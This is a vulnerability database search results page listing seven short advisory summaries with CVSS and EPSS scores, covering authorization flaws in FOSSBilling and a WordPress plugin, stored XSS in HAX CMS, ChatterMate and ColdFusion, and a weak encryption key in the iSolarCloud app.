Lucene search
K

7 matches found

NVD
NVD
added last week5 views

CVE-2026-27708

FOSSBilling is a free, open-source billing and client management system. In versions 0.7.2 and prior, the Servicecustom Client API's call method accepts an orderid parameter and fetches the associated order without verifying the authenticated client owns it, potentially exposing cross-client data...

7.1CVSS0.00265EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2026/06/23 12:0 a.m.6 views

PT-2026-51591

Name of the Vulnerable Software and Affected Versions FOSSBilling versions prior to 0.8.0 Description A query-construction flaw in client list endpoints allows authenticated clients to bypass tenant scoping and retrieve data from other clients. The issue occurs in the getSearchQuery functions of...

7.1CVSS5.8AI score0.00282EPSS
Exploits0References8
Cvelist
Cvelist
added 2026/06/05 6:44 p.m.30 views

CVE-2026-46396 HAX CMS has a stored XSS via <iframe> that allows access to sensitive client-side data and account takeover

HAX CMS helps manage microsite universe with PHP or NodeJs backends. A stored cross-site scripting XSS vulnerability exists in versions prior to 26.0.0 due to improper sanitization of elements. The application allows javascript: URIs in the src attribute, which are executed when a malicious page ...

9.3CVSS0.0023EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/01/24 12:0 a.m.5 views

PT-2026-4544

ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an payload containing a javascript: URI can be processed and executed in the browser context. This allow...

9.3CVSS5.4AI score0.00302EPSS
Exploits1References4
RedhatCVE
RedhatCVE
added 2025/05/22 6:25 p.m.5 views

CVE-2021-25002

The Tipsacarrier WordPress plugin before 1.5.0.5 does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL...

7.5CVSS6.8AI score0.0147EPSS
Exploits2References1
Cvelist
Cvelist
added 2025/02/26 12:0 a.m.31 views

CVE-2024-50684

SunGrow iSolarCloud Android app V2.1.6.20241017 and prior uses an insecure AES key to encrypt client data insufficient entropy. This may allow attackers to decrypt intercepted communications between the mobile app and iSolarCloud...

0.00325EPSS
Exploits0References1
securityvulns
securityvulns
added 2003/09/23 12:0 a.m.29 views

ColdFusion cross-site scripting security vulnerability of an error page

The outline of vulnerability Macromedia's ColdFusion can display the various information about an error at the time of error occurred. There is information transmitted from a client machine like "Referer". ColdFusion displays the information as it is. An attacker can execute a script on victim's...

6.8AI score
Exploits0
Rows per page
Query Builder